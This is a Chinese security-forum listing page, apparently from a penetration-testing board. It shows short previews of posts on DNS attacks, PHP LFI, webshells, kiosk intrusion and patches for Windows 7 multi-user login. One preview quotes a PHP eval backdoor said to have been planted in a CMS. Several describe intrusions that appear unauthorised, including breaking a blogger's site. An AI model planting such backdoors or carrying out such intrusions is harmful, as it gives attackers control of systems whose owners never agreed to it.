渗透测试
![[科普]DNS相关的攻击介绍](https://www.t00ls.com/attachments/month_1311/13111509135031af648d84e1f3.jpg)
[科普]DNS相关的攻击介绍
一 什么是DNSDNS 是域名系统 (Domain Name System) 的缩写,是因特网的一项核心服务,它作为可以将域名和IP地址相互映射的一个分布式数据库,能够使人更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。DNS 域名结构通常 Internet 主机域名的一般结构为:主机名.三级域名.二级域名.顶级域
记一次内网渗透检测
朋友扔过来的一个公司,域名是aaainc.com,什么信息也没有。Google搜了下,只有主域名上面有个网站,还是托管在其他地方的,用的是开源的cms,没什么漏洞。0x01 信息收集 先看看这公司是不是有自己的对外办公网络吧,Nslookup看了下mx记录,发现是mx.aaainc.com,mx0.aaainc.com,也就是说这是他们自
浅析java中File.getPath()方法引发命令执行漏洞的成因
这个版块有权限,就发这边吧,分析不到位的地方还请大牛提出宝贵意见,转载请注名出处,土司首发今天看到某童鞋的提问,大概意思是某执行命令处代码有没有办法利用,详见https://www.t00ls.com/thread-24621-1-1.html.看不到的童鞋木有关系,代码我已经摘录了,请看:代码片段1:try {
php LFI读php文件源码以及直接post webshell
感谢 @w1ngs 把内容贴出来,劳动成果是他的。最近在忙defcon的题目集训 其中有一套题目里 有个老外写的writeup中提到了LFI的另一种小技巧 原文请参考 http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/PS: 该技巧并不是新的技术 神牛肯定已经用得觉得无聊了 所以当路过就行了
php://input,php://filter,data URI schema的那些事
感谢 @t00ls管理团队01 把内容贴出来,劳动成果是他的。一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用
ASP在stream以及fso组件被清除后的一点突破
路遇一站,webdav打开着,可以put,可以move,于是很容易拿到了webshell,但是发现菜刀连不上。仔细一看ADODB.Stream组件无法CreateObject,Scripting.FileSystemObject也一样无法CreateObject。服务器支持aspx,可是无法上传文件,也无法查看目录。测试了下,发现SHELL.APPLICATION还在,SHELL.APPLIC
【转载】win7的多用户登录方法和补丁收集
分享发帖,大牛勿踩。之前遇到一台英文win7主机,想给它多开,四处搜刮了一下。win7的多用户登录方法和补丁,几乎所有方法原理都差不多,就是替换C:\Windows\System32\termsrv.dll收集了以下,大概有以下这么几种:先分享老外的两个补丁,原帖http://www.techjam.gr/2012/os-tricks/enable-multiple-re
Windows下的无线热点蜜罐
Windows下的无线热点蜜罐 /**************************************/* 作者:半斤八兩/* 博客:http://cnblogs.com/bjblcracked/* 日期:2013-09-30 23:59/**************************************只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教! 在许多公共场所我们都会看到有许多免密码的无线
自助终端机的常见入侵方式
自助终端机的常见入侵方式 Pursue for Freedom &Equality一、背景知识 自助终端机是将触控屏和相关软件捆绑在一起再配以外包装用以查询用途的一种产品。其应用范围广泛,涉及到金融、交通、邮政系统、城市建设、工业控制等各行业,在机场、车站、银行、酒店、医院、展览
拿MYHACK社工库图解
截止发帖,已经搞坏了他的BLOG,博主如何看到了,只能说抱歉了,重新复制一份wp-include 下的 pluggable.php 即可,这里没录像,只有过程中的一部分截图,没技术可言,当水帖看吧1. 首先探测网站上有哪些信息,发现共两套程序,一套供数据查询的PHP框架 和 用wordpress搭建的BLOG2.使用工具wpscan扫描
